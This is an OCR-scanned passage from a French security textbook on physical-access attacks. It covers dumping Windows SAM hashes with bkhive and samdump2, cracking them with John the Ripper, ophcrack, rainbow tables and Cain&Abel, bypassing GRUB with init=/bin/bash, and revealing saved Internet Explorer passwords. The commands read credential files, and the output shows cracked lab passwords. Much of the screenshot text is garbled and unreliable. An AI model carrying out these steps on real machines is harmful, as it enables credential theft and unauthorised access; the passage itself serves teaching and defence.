mount /dev/hdal /mnt/hdal 


X 


Lançons un terminal (clic sur l'écran à gauche sur la barre d'outils). Nous 
nous retrouvons sous une invite de commande, vérifions que la partition 
est bien montée en listant celle-ci : 


È ls /mnt/hda1 


Shell - Konsole 
pt ls /ant/hdal z TAE 
AUTDEXEC . BAT+ He 4 / ë ru y / 
Bootfont .bin* ; 1/ I0.SYS4 / boût .inis 


CONFIG, SYS+ f MSDOS. SYS+* StandAlonelabs .pdf*” ntldr* 
ocun sttings NIDETECT CON | / pagefile.sys* 


Vérification du montage du système de fichier hôte 


Pour dumper la base, nous utilisons l'utilitaire bkhive pour récupérer la clé 
de cryptage et la sauvegarder dans un fichier texte et l'utilitaire sam- 
dump2 à qui nous indiquons l'endroit où nous avons sauvegardé cette clé. 


Dans un premier temps tapons la commande : 


I bkhive /mnt/hdal/windows/system32/config/system /tmp/keyfile.txt 
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Ebt ~ # bkhive /mnt/hdal/WINDOWS/system32/config/systen /tmp/keyfile. txt 
Ebkhive 1.1.1 by Objectif Securite 
http://www, ohjectif-securite.ch 
original author: ncuomo@studenti.unina.it 


{Root Key : $$$PROTO.HIV 

Default ControlSet: 001 

| mama 55b9b0d90014ad3aefb3133f248€07b9 
Ebt - # 


Récupération de la clé de cryptage 


Le système nous indique qu'il a bien récupéré la clé de cryptage en nous 
affichant son numéro. Ensuite nous lançons l'utilitaire samdump2 avec la 
commande suivante : 


I samdump2 /mnt/hdal/windows/system32/config/SAM /tmp/keyfile.txt 


Shell - Konsole 
fbt- # samdump2 /mnt/hdal/windows/system32/config/SAN /tmp/keyfile. txt 
Ésamdump2 1.1.1 by Objectif Securite 


Ehttp://ww.objectif-securite.ch 
original author: ncuomo@studenti.unina.it 


ÉRoot Key : SAM 
Administrateur :500:cbd9d2991c073022e10beb902d84645f : 302 1aa384ab8aa434ab leea0 145 fb06e: : : 
ETnvité:501:aad3b435b5 1494eeaad3b435b5 1404ee:31d6cfe0d16ae931b73c59d7e0c089c0: : : 
HelpAssistant:1000:bd37c2fb662b5ea59c74eeb55cad9684: 7535235380cf64f0373b8293673696f56: : : 
ASPNET:1001:badf0b6f41df18de5db47f48 1edbe446: 1a82efe40cde2c9c7eeSee98955fa0ed: : : 
rezor : 1002: 1443bbd40825575aaad3b435b5 1484ee: 6f9b6aa9a8f8033cef806d45ff5d0230: : : 
Écdaisi:1003:083f94c239a83669aad3b435b5 1404ee: 72c95294c4d846b9ff d0 f50 1593b7c93: ; : 
Étest_oph:1004:6867e103b7f2bd5d8716baf1c7da4211:7de828f752f5b70537bf277b7bc716f7: : : 
E test2_oph:1005:13040c05676e522171e33fef493d3985 : 5a85356b499:104f0274972d385 f6d39: : : 
Ft 1006:c5c9a19da8bafc61abOb09b8943430a5 : 7db51947d90f 10dfdd04b3d3b79a4c44: : : 
bt + # 


Affichage des hashes mots de passe 


Il suffit ensuite de sauvegarder ces hashes dans un fichier texte que l'on 
copiera ensuite sur une clé USB pour les décrypter ailleurs. 
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samdump2 1.1.1 by Chbjectif Securite 
http://ww.objectif-securite.ch 
original author: ncuomo@studenti.unina.it 


Root Key : SAM 
k 5 more /tmp/hashes.txt 
Administrateur:500:cbd9d2991c073022e10beb902d84645f : 302 1aa384ab8aa434ab 1eea0 145 fb06e: : : 
Invité:591:aad3b435b5 1494eeaad3b435b51404ee:31d6c fe0d16ae931b73c59d7e8c089c0: : : 
HelpAssistant:1000:bd37c2fb662b5ea59c74eeb55cad9684: 7535a5380cf64f0373b8293673696f56: : : 
HASPNET: 1001:badf#b6f41df 18de5db47f48 ledbe446: 1a82efe40cde2c9t7ee5ee98955 fa0ed: : : 
Hrezor : 1002: 1443bbd40825575aaad3b435b5 1404ee: 6f9b6aa9a8f8033cef006d45 ff5d0230::: 
f cdaisi:1003:083f94c239a83669aad3b435b51404ee: 72c95294c4d846b9f fd0f581593b7c93:; : 
Btest_oph:1004:6867e103b7f2bd5d8716baf1c7da4211:7de828f752f5b70537bf277b/bc716f7: : : 
Mtest2_oph:1005:13040c05676e522171e33fef 49343985 : 5a85356b499a104f0274972d385f6d39::: 
Éd ARE te" é qu à 
ot = # 


Sauvegarde des hashes dans un fichier 


2.2.3 Les différents types d'algorithmes de cryptage 


Secret partagé/Syméltrique 


C'est le cryptage le plus classique que l'on rencontre et les algorithmes pré- 
sentés ci-dessous sont des standards. Ils ont été validés et révisés par la 
communauté Internet internationale et surtout ils sont très bien documen- 
tés tant au niveau de leurs forces que de leurs faiblesses. 


L'algorithme IDEA est un algorithme suisse très puissant, épine dorsale de 
PGP, il est très rapide et peut aller jusqu'à des clés de 128 bits. C'est un 
algorithme de haute sécurité. 


L'algorithme Blowfish est un algorithme de chiffrement de 64 bits assez 
récent. Il a été créé par Bruce Schneier, référence en terme de cryptographie 
et peut aller jusqu'à des clés de 448 bits. Il est très rapide et beaucoup plus 
puissant que le DES. Il est utilisé dans des applications militaires. 


L'algorithme RC4 est un outil de chiffrement rapide utilisé pour SSL. Il est 
considéré comme sécurisé dans son implémentation à 128 bits. 
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L'algorithme DES est le standard industriel. Il est rapide mais assez peu 
sécurisé. C'est le plus utilisé de tous les algorithmes de cryptage même si 
tous les experts s'accordent à dire qu'il vaut mieux éviter son utilisation. 


Clé publique/Asymétrique 


Algorithmes découverts à la fin des années 70, ils fonctionnent sur un sys- 
tème à deux clés. Une clé pour crypter les données, un autre pour les 
décrypter. Ainsi si l'on ne dispose que d'une seule clé et du message chiffré, 
il est très difficille de trouver l'autre clé. 


L'algorithme RSA est un cryptage à clé publique reposant sur le fait que 
plus les nombres sont grands, plus le temps pour les décomposer s'accroît 
de manière exponentielle. C'est le système de clé publique de PGP. 


Les algorithmes One Way Digests 


Ce sont des algorithmes de hashes qui transforment une chaîne de caractè- 
res de taille variable en une hash de taille fixe. Ils sont utilisés pour sceller 
électroniquement un message s'appuyant sur le fait qu'il est pratiquement 
impossible que deux messages puissent avoir la même empreinte digitale. 
Cela assure l'intégrité du message transmis. 


Les algorithmes MD5 (128 bits message digest) et SHA (160 bits message 
digest) permettent de s'assurer qu'un message n'a pas été altéré. 


Les hashes de type LM et NTLM 

Nous allons nous intéresser aux hashes récupérées lors du dump de la base 
SAM. Ce sont des hashes Windows qui sont de type LM et NTLM. Lan 
Manager est un protocole mis en place en juin 1987 par Microsoft pour des 
clients limités à l'époque à DOS, Windows 3.1 et OS2. NTLM fût son suc- 
cesseur pour Windows NT. 


Pour comprendre les faiblesses de NTLM, il faut donc comprendre le fonc- 
tionnement de LM. 
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Lan Manager utilise une clé de hachage pour transformer un code de taille 
qui peut varier en un code de taille fixe. Il applique pour cela une fonction 
mathématique sur le mot de passe. Le mot de passe peut contenir quatorze 
caractères. Si celui-ci est plus court, LM ajoute des 0 pour atteindre la taille 
de 14 caractères. Il convertit ensuite le mot de passe en majuscules et 
divise celui-ci en deux parties de sept caractères (c'est le point faible de 
cette méthode). 


Une clé DES (Data Encryption Standard) de 56 bits (7x8) est ensuite cons- 
truite pour chacune des deux moitiés de 7 octets. Elles sont ensuite conca- 
ténées pour donner une clé de hachage sur 16 octets. 


La faiblesse de ce procédé découle du fait que la division en deux parties 
nous fait utiliser un cryptage sur 56 bits pour deux mots de 7 octets en lieu 
et place d'un cryptage de 112 bits (14x8) pour un mot de 14 octets. 


De plus l'algorithme DES 56 bits n'est aujourd'hui plus recommandé et l'or- 
ganisme américain NIST conseille le triple DES. Il est généralement conseil- 
lé d'utiliser le protocole NTLMv2 qui chiffre sur 128 bits et utilise un sys- 
tème « challenge-response ». 


Utiliser John the Ripper pour trouver les mots de passe 


John the Ripper [3] est ce que l'on appelle un perceur de mot de passe. 
Nous allons l'utiliser sur des mots de passe Windows mais il peut être utili- 
sé sur des mots de passe Linux ou d'autre type. Pour comprendre son fonc- 
tionnement, il faut savoir que généralement les algorithmes d'authenfica- 
tion fonctionnent de manière asymétrique, ainsi à la saisie du mot de passe 
d'un utilisateur, celui-ci sera crypté à l'aide d'un algorithme et stocké sous 
cette forme. À la connexion suivante de l'utilisateur, le mot de passe saisi 
sera crypté avec le même algorithme et la forme obtenue comparée à la 
forme stockée. 


John the Ripper fonctionne également de cette façon, il génère des mots de 
passe probables et les crypte avec ce même algorithme pour trouver une 
concordance avec la forme cryptée contenue dans le fichier hashes.txt récu- 
péré précédemment. Cette façon de faire est communément appelée du 
"brute force". 


© Editions ENI - Toute reproduction interdite 


Les failles physiques 
Chapitre 4 


La commande pour lancer John est très simple, il suffit de lui indiquer le 
chemin des hashes : 


i john acissi/livre/images_backtrack/hashes.txt 


bash-3,2# jehn acissi/livre/images_backtrack/hashes,txt 
Loaded 12 EE ae with no different salts (NT LH DES [64/64 BS MHX]) 

cdaisi 

(Administrateur :2) 

(testeph3:2) 

(test2:2) 

(Adninistrateur:1) 

(test:2) 
time; 0:00:25:25 (3) c/s; 19813K trying? FTIIJ42 - FTIIJ8E 
time: 0 8 (3) c/s: 19815K trying: JTEUOLD - JTEWOCI 
times (3) c/s: 19822K trying: 2850ZN1 - 2850ZRL 
time! c/s; 19824K trying: CALYK2X - CAL92-7 
time: c/s: 19822K trying: C0749L7 - C074313 
time: c/s; 19821K trying: MUINIKU - MUINNUS 
time; c/s: 19819K trying: MWUPSIZY - MWPSYJ3 
time; c/s; 19801K trying: DKC1G4S - DKC1AD4 
time! c/s; 19799K trying; RBNFDL7 - RENF-F4 
time: c/s: 19797K trying: GRILAKL - GRIL1B- 
time: c/s: 19796K trying: GSHSIMC - GSHSAIP 
time: c/s; 19879K trying: UMQHMC - UHQHD2 
time! c/s; 19880K trying: UFK7ON - UFK714 


guesses? 
guesses: 
guesses? 
guesses: 
guesses? 
guesses; 
[auesses: 
[auesses! 
f guesses; 
f guesses; 
guesses: 
| guesses; 
À ES 


C1 1 © © © © C1 C1 C1 C1 ON ND 


ponnmnnmmmmaomm 
RON ENNRB OO NN 


Le perceur de mot de passe John The Ripper 


Un appui sur une touche nous indiquera ce que teste le process et sa durée. 
Si l'on veut voir où en est la progression du crack des mots de passe, il suf- 
fit de retaper la commande lancée en lui passant l'argument --show : 


i john --show acissi/livre/images_backtrack/hashes.txt 
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bash-3,2# john --shou acissi/livre/images_backtrack/hashes.txt 
+ |Adninistrateur ?ROCKMYROOT :500:3021aa384ab8aad34ableea0145fbü6e; : 
| | Invité: :501:31d6cfe0d16ae931b73c59d/7e0c089c0: : : 


g 


| JrezersACISSI:1002;6f9b6aa9a8f8033cef006d45ff5d0230:; : : 


.. 


L |test2_oph129222795413: 1005: 5a85356b499a104 F02749724285F6d39: ; ; 
-|testophs:ACIS512008:1006 : 7db51947490F 10 Fdd04b3d3b7Sadc44 : : : 


L 9 password hashes cracked, 6 left 
Lbash-3,2# I 


Visualisation de l'avancement du crack 


Quand nous lançons John sans option, il pratique selon trois modes du 
plus rapide au plus long : 

- Le mode single ou mode simple ; 

- Le mode wordlist ou dictionnaire [4] ; 

- Le mode Incrémental. 


Ces trois modes sont donnés dans l'ordre du plus rapide au plus long. 


Le mode simple utilise les logins utilisateurs et leur applique les règles [5] 
définies dans le fichier john.conf. 


Le mode wordlist ou dictionnaire permet de spécifier à John d'utiliser un 
fichier texte qui contient un mot ou une expression par ligne. Il en existe 
de très gros que l'on peut trouver sur Internet et ce dans toutes les langues 
et dans de nombreux secteurs d'activité. 


Par défaut et sans précision de notre part, John utilisera son dictionnaire 
par défaut qui se trouve dans /usr/share/john/password.lst. Dans le cas où 
nous voulons préciser un dictionnaire à utiliser, la commande à lancer est 
très simple, il suffit de lancer John comme précédemment en lui ajoutant 


l'option --wordlist et de lui spécifier l'emplacement du dictionnaire à utili- 
ser : 


john --wordlist:/usr/share/john/password.ilst/livre/images backtrack/ 
hashes. txt 
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bash-3,2# john --wordlist:/usr/share/ john/passuord,lst acissi/livre/images_backt 
rack/hashes.txt 

Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS HMX]) 
guesses; 0 time! 0:00:00:00 100% cs: 310000 trying: SHAWN - ZHONGGU 
bash-3,2# john --shou acissi/livre/images_backtrack/hashes,txt 

Administrateur :ROCKMHYROOT :500: 3021aa384ab8aad34ableea0145fb06e: : : 
Invité::501:31d6cfe0d16ae931b73c59d7e0c089c0: : : 

rezor 2ACISSI:1002:6f9b6aa9a8f8033cef006d45ff5d0230: : : 
cdaisi!CBAISI:1003:72c95294c4d846b9ffd0F501593b7c93;: : : 


e.. 
+.. 
CHE 
+.. 
.. 
++ 


testoph3:ACISSI2008:1006: 7db51947d90F10df dd04b3d3b73adc44: 


9 passuord hashes cracked, 6 left 
bash-3.2# J 


"Brute force" en mode dictionnaire 


Le mode incrémental teste toutes les combinaisons de caractères dans une 
plage donnée et dans un jeu de caractères que l'on doit lui définir, ce mode 
est très long (pouvant aller jusqu'à quelques années) et n'est jamais mené à 
terme. 


Si on regarde le résultat de John, nous nous apercevons en effet que le 
décryptage d'un mot de passe de type LM se fait sur deux parties. Prenons, 
par exemple, le mot de passe du compte administrateur, nous constatons 
qu'une première partie (Administrateur : 1) « ROCKMYR » est décodée puis 
une deuxième (Administrateur : 2) « OOT » suit. En mettant ces deux par- 
ties bout à bout, nous obtenons le mot de passe final qui est 
« ROCKMYROOT ». 


Utilisation des tables rainbow 


Une méthode très efficace et plus rapide de décryptage de mots de passe 
est l'utilisation des tables rainbow ou arc-en-ciel en français. Une table 
arc-en-ciel en cryptologie est une structure de données qui permet de 
retrouver un mot de passe à partir de son empreinte. 
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Une table arc-en-ciel est constituée de paires de mots de passe. Chaque 
ligne de cette table possède un mot de passe de départ et une empreinte 
d'arrivée. Le calcul de la table se fait en faisant subir au mot de passe initial 
une très grande série de réductions et de hachages successifs afin d'obtenir 
des éléments intermédiaires que sont les nouveaux mots de passe et les 
empreintes correspondantes. La fonction de réduction transforme une em- 
preinte en un nouveau mot de passe. Cette fonction est cohérente, c'est à 
dire qu'elle retourne toujours le même mot de passe quand on lui passe une 
même empreinte en paramètre. Afin d'éviter des problèmes de collision, 
plusieurs fonctions de réduction sont utilisées. On répète ces opérations 
des milliers de fois et on obtient une empreinte en bout de chaîne. Celle-ci 
sera stockée avec le mot de passe d'origine, on ne garde pas le reste de la 
chaîne générée pour des raisons de taille de fichier. Nous pouvons néan- 
moins retrouver cette chaîne en la recalculant à partir du mot de passe 
d'origine conservé. On passe à la deuxième ligne et on recommence l'opéra- 
tion jusqu'à constituer une table dont les statistiques sont suffisantes pour 
garantir le succès de l'attaque. 


Pour expliquer plus clairement ce principe nous dirons que P est le mot de 
passe d'origine, H est la fonction de hachage appliquée et R1,R2... les diffé- 
rentes fonctions de réduction de la chaîne. Nous avons en tête qu'une fonc- 
tion de hachage donne une empreinte et une fonction de réduction donne 
un mot de passe. La chaîne se crée de cette façon : 


P==>H(P)==>R1(H(P))==>H(R1(H(P)))==>R2(H(R1(H(P))))==>H(R2 
(H(R1(H(P)))))... 
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Tout cela semble bien compliqué, essayons d'illustrer par un exemple le 
fonctionnement des tables Rainbow. 


Création d'une table rainbow de deux lignes 


code rezo brix t tasm 
576cB5ba 563ea12f 4455c08b | 1958ef5d 


| T i 


| reduction |— reduction |— | reduction -4 
kore tite agne t tiot 
956ace45 aef24532 bde43a56 ý 1962cae5 
M: [m] 
Rainbow Table ee 1958ef5d 
kore 1962cae5 


Génération d'une table rainbow de deux lignes 


Commençons par un cas très simple, nous essayons de craquer l'empreinte 
« 1962cae5 ». Celle-ci figure directement dans la table à la ligne 2 et est 
associée avec le mot de passe « tiot » comme nous venons de le dire celui-ci 
n'est pas stocké dans la table. Nous allons donc regénérer la chaîne. Nous 
prenons le mot de passe initial qui est « kore » le passons dans la fonction 
de hachage ce qui donne « 956ace4 » puis dans la même qui a servi à géné- 
rer la table, celle-ci nous renvoie le mot de passe « tite » On continue la 
manipulation de hachage et de réduction consécutive ce qui nous renvoie le 
mot de passe « agne », une nouvelle manipulation de ce genre et nous 
récupérons le mot de passe « tiot » nous passons celui-ci dans la fonction de 
hachage et nous récupérons l'empreinte « 1962cae5 », le mot de passe est 
« Hot ». 
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Ceci est un cas idéal, car l'empreinte figure directement dans la table. 
Essayons maintenant de craquer l'empreinte « 4455c08b » qui ne figure pas 
dans la table Rainbow de l'exemple. Nous appliquons la fonction de réduc- 
tion sur l'empreinte « 4455c08b » ce qui nous donne le mot de passe 
« fasm », nous passons celui-ci dans la fonction de hachage qui nous renvoie 
l'empreinte « 1958ef5d ». Celle-ci figure dans la table rainbow à la première 
ligne. Nous reprenons donc le mot de passe initial de la ligne qui est 
« code » comme pour le premier cas nous reconstituons la chaîne. En deux 
coups de hachage-réduction nous obtenons le mot de passe « brix » qui une 
fois haché nous donne l'empreinte « 4455c08b ». Nous avons donc trouvé le 
mot de passe « brix » qui correspond à l'empreinte recherchée « 4455c08b ». 


Générer ses tables rainbow 


Maintenant que nous avons compris comment fonctionnent les tables 
Rainbow, il faut se les procurer. Nous avons différentes alternatives, il est 
possible de se les procurer en les téléchargeant sur Internet [7], une simple 
recherche sur google devrait vous donner les liens où les télécharger. Il 
existe aussi des sites qui vous proposent de faire gratuitement le travail 
pour vous en échange d'un peu de votre temps processeur pour créer des 
tables pour une communauté. Le site freerainbowtables [8] en est un, nous 
n'avons qu'à nous inscrire et télécharger un client. 


Nous pouvons également, si nous avons de la place pour les stocker, déci- 
der de créer nous-mêmes nos tables rainbow. Il existe un utilitaire, « rtgen » 
sous Linux et « winrtgen » [9] sous Windows permettant de générer celles-ci. 
Nous allons étudier winrtgen, il propose une interface graphique plus 
conviviale. Winrtgen permet de générer les tables pour les algorithmes d'en- 
cryption LM, FastLM, NTLM, CiscoPIX, MD2, MD4, MD5, SHA-1, SHA:-2 
(256), SHA-2 (384), SHA-2 (512), MySQL (323), MySQL (SHA1) et 
RIPEMD160. 
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Pour utiliser winrtgen, il suffit de le télécharger et de lancer l'exécutable 
« wintrgen.exe ». 


m Winrtgen v2.8 (Rainbow Tables Generator) by mao 


Filename Status 


Moa 


Add T able Remove Remove All About | 


Générateur de table rainbow-Le logiciel winrtgen 


Une interface d'accueil s'ouvre alors et nous devons lui dire d'ajouter une 
table. 
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Longueur min-max 
Mot de passe E 


Rainbow Table properties | 


Nombre de chaînes par table 


Hashar Minlen- f Max Len Index p Chain Len— r Chain Count — 7 N° of tables — 


LL a 


Algorithme 


r Charset-—— 
FRE 


et 
f 


j 
| 
1 4 
j 


Key space: 80603140212 keys Nombre de tables 


Disk space: 2.98 GB (610.35 MB each table) 
Success probabiity: 0.990635 (99.06%) 


- Benchmark = ~ nee RER 


Hash speed: 

Step speed: 

Table precomgutation time: 

Total precomputation time: 
Mar cryptanalysis time: 


Benchmark {Calcul temps génération Cancel 


Création des tables Rainbow pour un algorithme d'encryption LM 


Une deuxième fenêtre s'ouvre alors où nous pouvons agir sur différents cri- 
tères. Ainsi nous pouvons choisir le type d'algorithme d'encryption la lon- 
gueur min et max du mot de passe, l'index de la table, le nombre de hashes 
de la chaîne, le nombre de chaînes dans un fichier et le nombre de tables. 
Nous choisissons également le jeu de caractères à partir duquel nous vou- 
lons générer la table (alpha, alpha numérique...). 


Les propriétés de la table vous indiquent l'espace occupé par les tables ainsi 
que le taux de réussite estimé du craquage du mot de passe. Si nous 
appuyons sur le bouton Benchmark, nous pouvons visualiser le temps cal- 
culé pour générer les tables. 
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2.2.8 Utiliser OPHCRACK 
Ophcrack est un logiciel de référence dans l'utilisation des tables rainbow. 
Nous le trouvons facilement sur Internet, la version actuelle est la 3.3. Il 
est disponible pour Windows et Linux. À l'installation le logiciel vous pro- 
pose de télécharger des tables rainbow pour XP et Vista (Xpsmall and fast, 
vista free). 


| B ophcrack 3.0 Setup 


Choose Components 
Choose which features of ophcrack 3.0 you want to install, 


Check the components you want to install and uncheck the components you don't want to 
install, Click Next to continue. 


Select components toinstal: || ophcrack (required) 
 [v] Download and Install small WinXP tables (380MB) 


Download and Install fast WinXP tables (703MB) 
| Download and Install free Vista tables (461MB) 


Space required: 1,568 


Installation de OPHCRACK et téléchargement de tables rainbow de base 


Lançons OPHCRACK, la première chose à faire est de déclarer les tables à 
utiliser en cliquant sur l'onglet Tables. Les tables téléchargées se trouvent 
dans c:\ProgramFiles\ophcrack\tables. 
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98 ophcrack 
Load Tables Crack 


Progress 


5 LMHash NT Hash EM Pwd 1 LM Pwd 2 


Directory Status Progress 
>- @ XP free fast C:/ProgramFiles/.. on disk SEE Sna 


| Time elapsed: Í Oh Om Ch 


Le logiciel OPHCRACK 
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Ï 93 Table Selection 


Table Directory 


; Se XP german vi 
po @ xP german v2 
$= @ Vista special 
i- @ vista free 

i @ XP special 


Misc E ARAA AA 


® = enabled è = disabled  ® = not installed 


aee 


Déclaration des tables rainbow 


Nous devons ensuite charger le fichier de hashes récupéré lors du dump de 
la base SAM à l'aide de l'onglet Load puis nous cliquons sur l'onglet Crack. 
Cette façon de faire est très efficace et nous voyons vite arriver les mots de 
passe, il suffira d'une minute à peine pour récupérer la plupart des mots de 


$- @ XP free fast C:jProgram Files/ophcrack/tables/… 


Status 
on disk 


not installed 
not installed 
not installed 
not installed 
not installed 


passe dont celui de l'administrateur, très impressionnant ! 
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ephcrack 


Dette Save Tables Stop Help 


Progress Statistics q Preferences | 


User bé LM Hash NT Hash LM Pwd 1 LM Pwd2 


Administrateur cbd9d2991c0730... 3021aa384ab8aa... ROCKMYR OOT rockmyroot 
Invité 3idécfe0di6ae9.. empty 
Helpâssistant bd37c2fb662b5e.. 7535a5380cf64f.. 

ASPNET badfObéf41df18d... 1a82efe40cde2c... 

rezor 1443bbd4082557... 6F9b6aa9a8f803.. ACISSI acissi 
cdaisi 083F94c239a836... 72c95294c4d846.. CDAISI cdaisi 
test_oph 6867e103b7f2bd... 7de828f752f5b7... A213CIS A2iScissSi2 
test2_oph 13040c05676e52... 5a85356b499a10.. A215CIS À2ISCiSs413 
testoph3 c5c9a19da8bafc.. 7db51947d90f10... ACISSIZ acissi2008 


Table Directory Status Progress 
Bb @ xP free fast C:/Program Files! 34% in RAM 
D- ® XPfree s.. C:/ProgramFiles/.. on disk 
b @ Vistafree  C:/PregramFiles/. on disk 


Preload: l l done | | Brute force: i done i i | | Time elapsed: | “Dh im 5s 


Résultat du décryptage de mots de passe 


2.2.9 Utilisation du logiciel Cain&Abel 


On ne saurait parler de décryptage de mots de passe sans parler de la 
fameuse boîte à outils audit de sécurité « Cain& Abel ». Ce logiciel est multi- 
fonctions et intègre une partie de recherche de mots de passe qui permet de 
choisir son mode de décryptage (bruteforce, rainbow... ). 
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FE Fie View Configure Tools Help 


lsHoNME +o UmmrErsOÉsonr OT 
E] Protected Storage = Network Le snéer [ef 15ASecets |7 Coder [@ raceroute le cu [F Wrskss | 


æ&u LM & NTLM Hash ™] 
HA NTLMv2 Hashes 4 i 
HA ms-Cache Hashes ( 
PWL fies (0) | | 
isco 1OS-MDS Hast | 
HscoPIX-MDS Hash | 
APOP-HDS Hashes | 
CRAM-MDS Hashes: 
4 OSPF-MDS Hashes i 
 RIPV2-MD5 Hashes! 
VRRP-HMAC Hashe! s 
VNC-39E5 (0) 
MA MO2 Hashes(0) 
|| : 4 MD4 Hashes (0) 
: 44 MBS Hashes (0) 


j 


D: B, RIPEMD-160 Hashe! 
i: ger Preauth Hasi | 


S IKE-PSK Hashes w; | 
i F5) MSSQt Hashes (0) + 
MySQL Hashes (0) 
Fa Oracle Hashes (0) 


à SIP Hashes (8) x E 
pos: LM & NTLM Hashes 


Le logiciel CaingAbel 


Quand nous lançons Cain&Abel, nous nous retrouvons devant un panel 
impressionnant de fonctionnalités. Nous nous intéresserons à l'onglet 
Cracker. À gauche, tous les algorithmes que supporte Cain&Abel. Nous 
allons ajouter un fichier de hashes en cliquant sur le signe +, une fenêtre 
s'ouvre et nous lui spécifions l'endroit où se trouve le fichier d'empreintes. 
Ensuite nous sélectionnons tous les hashes dans la fenêtre et nous faisons 
un clic droit qui nous propose un menu. Nous choisissons « Tables oph- 
crack », nous lui indiquons où se trouve la table à utiliser et nous lançons le 
programme de décryptage. 
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Une fenêtre indiquant l'état d'avancement du travail s'ouvre alors et le 
résultat final sera affiché dans le panneau principal. 


| Add NT Hashes from 


rC : Import Hashes from local system 
F Include Password Histon Hashes 


S Import Hashes from a text file 


E ‘Documents and Settings\rezonBureau\hashes.tst E 


£ at Hashes fan a SAM i a EE] 


| y 3 
| S&M Filename 


Cancel | -Next> | 


Utilisation des tables rainbow dans Cain&Abel 
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: -À M5-Cache Hashe: 
Le PWL files (0) 
k Cisco 105-MDS 


ž LME HT 
LA 8 NTM 
: 


via RainbówTables (OphCrack} 
via RanbonTables (RanbowCrack) 
via FastLM Ron ables(Witgen} 


+ SA SHA-1 Hashes @) £ 
: sh SHA-2 Hashes (0) 


Addtokst 
Remove 
RemoveAll 


Oracle Hashes (0) 
SIP Hashes (0) 


Choix du modèle de craguage 


Tout ce qui a été dit précédemment reste valable pour le système Linux. 
L'algorithme md5 est malgré tout plus difficile à craquer et cela prendra 
plus de temps pour trouver les mots de passe. 


Cela dit Linux n'est pas sans failles, il suffit de citer pour s'en convaincre la 
fameuse faille du grub [10]. Le grub sous Linux est ce que l'on appelle un 
boot loader, c'est-à-dire qu'il permet de choisir entre le démarrage de plu- 
sieurs systèmes installés sur la machine, il nous permettra par exemple de 
choisir entre le démarrage de Linux ou de Windows. 
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GNU GRUB version 0.97 (639K lower - 261956K upper memory) 


Debian GNU/Linux, kernel 2.6.26-1-686 


& 


Use the f and 4 keys to select which entry is highlighted. 
Press enter to boot the selected OS, ‘e’ to edit the 


32 


commands before booting, or °c’ for a command-line. 


Le boot loader Grub 


En fait, il est facile d'éditer le Grub en tapant tout simplement la lettre 
«e » (éditer) au démarrage de celui-ci, nous choisissons la deuxième ligne et 
nous modifions celle-ci en changeant « ro » (read only) en « rw » 
(read-write) et en ajoutant « init=/bin/bash » nous appuyons sur la touche 
[Entrée] pour valider la modification puis « b » (boot) pour continuer le 
démarrage de l'ordinateur. Nous nous retrouvons en face d'une console en 
invite « root » (super utilisateur). 
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GNU GRUB version 0.97 (639K lower / 261056K upper memory} 


kernel /boot/vnlinuz-2.6.26-1-686 root=/dev/hdai ro quiet 
$ į a { 6-1 a 


i f 


Use the f and } keys to select which entry is highlighted. 
Press 'b’ to boot, ’e’ to edit the selected command in the 
boot sequence, °c’ à 


for a command-line, °p? to open a new line 
after CR’ for before) the selected line, ’d’ to remove the 
selected line, or escape to go back to the main menu. 


Edition du grub 


[ Minimal BASH-like line editing is supported. For 
the first word, TAB lists possible command 
completions. Anywhere else TAB lists the possible 
completions of a device/filename. ESE at any time 
exite 1] 


grub edit> kernel /boct/vmlinuz-2,6.26-1-6B6 root=/dev/hdai rw initz/bin/bash 


Modification du grub 


La contre-mesure est facile à mettre en œuvre, il suffit en fait de mettre un 
mot de passe sur le grub. Nous devons dans un premier temps générer un 
mot de passe crypté en mds. La commande est « grub-md5-crypt » et nous 
devons ensuite entrer un mot de passe et le confirmer. Le mot de passe est 
alors crypté en md5 et nous récupérons une suite de caractères incompré- 
hensibles que l'on appelle communément un « hash ». Nous éditons ensuite 
le fichier /etc/grub/menu.lst et juste en dessous de la ligne « time out » nous 
insérons « password -md5 "le hash généré" ». Pour éditer le grub, nous devons 
maintenant saisir « p » et entrer le mot de passe déclaré. 
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Il existe d'autres failles sous Linux mais les énumérer ici serait trop long. 


15101 š à 
dition Affichage Terminal Onglets Aide 
# menu.lst - See: grub(8), info grub, update-grub(8) 
: grub-install(8}, grub-floppy(8), 
grub-md5-crypt, /usr/share/doc/grub 
and /usr/share/doc/grub-legacy-doc/. 


## default num 

# Set the default entry to the entry numben.MNUM. Numbering starts from 6, and 

# the entry number 8 is the default if the<<Commandwisngteuseds 

# 

# You can specify ‘saved' instead of.a.number. In this case, the default entry f 
# is the entry saved with the command ‘’savedefautte, 

# WARNING: If you are using dm#raid do not change this entry to lsäved' or Your 

# array Will desync and will not Let you boot your system. 

default 0 T à 


## timeout sec 

# Set a timeout, in SEC seconds, before automatieally booting"the default entry 
# (normally the first entry defined). 

timeout 5 

Ifassword --#d5 $1$0hu.t$0/LIwB8/DwZZLPOFLOgPh. 

# Pretty colours 

cotor cyan/blue white/blue 


“/boot/grub/menu.lst" 142L, 4305C 


Modification du fichier menu.lst 


2.3 Accès à un ordinateur allumé en mode session 
utilisateur courant 


L'accès à un ordinateur allumé offre des possibilités de récupération de don- 
nées ; prenons le cas où l'ordinateur reste allumé sans verrouiller la session, 
n'importe qui peut copier nos données rapidement sur une clé usb ou via le 
réseau, poser une backdoor pour revenir ensuite discrètement sur votre 
ordinateur, installer un keylogger, visualiser l'historique de vos 
navigations... 
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2.3.1 Découvrir les mots de passe enregistrés dans Internet Explorer 


Nombreux sont les internautes qui, pour des facilités de saisie, enregistrent 
les mots de passe déclarés lors de l'inscription sur certains sites. Nous 
allons voir que cela peut devenir dangereux dès lors que nous laissons ne 
serait-ce qu'un moment notre machine accessible (déjeuner, pause...) Il 
existe de nombreux logiciels qui permettent de retrouver vos mots de passe 
enregistrés. Prenons par exemple l'application IE PassView, celle-ci est très 
légère, s'installe très vite et un simple clic pour la lancer suffit pour afficher 
quasi immédiatement les mots de passe enregistrés. 


IE PassView 
Fie Edit View Options Help 


ax IA 


Entry Name * Stored In i User Name Password 


Ehttp. oogle.corn/ac Registry oto 
lhttps:/fuiwlaposte.net/ AutoComplete Registry test acisst 
@https:f/{uwww laposte.net/ âutoComplete Registry enregistrersonmotde passe c'estdangereux 


o 


4 item(s), 1 Selected NitSoft Freeware. littp:iwww,nirsoftnet 


Enregistrer ses mots de passe peut devenir dangereux ! 


2.3.2 Révéler les astérisques cachant un mot de passe 


Nous connaissons tous les fameux astérisques empêchant de visualiser le 
mot de passe entré (ils restent d'ailleurs quelquefois déclarés dans la boîte 
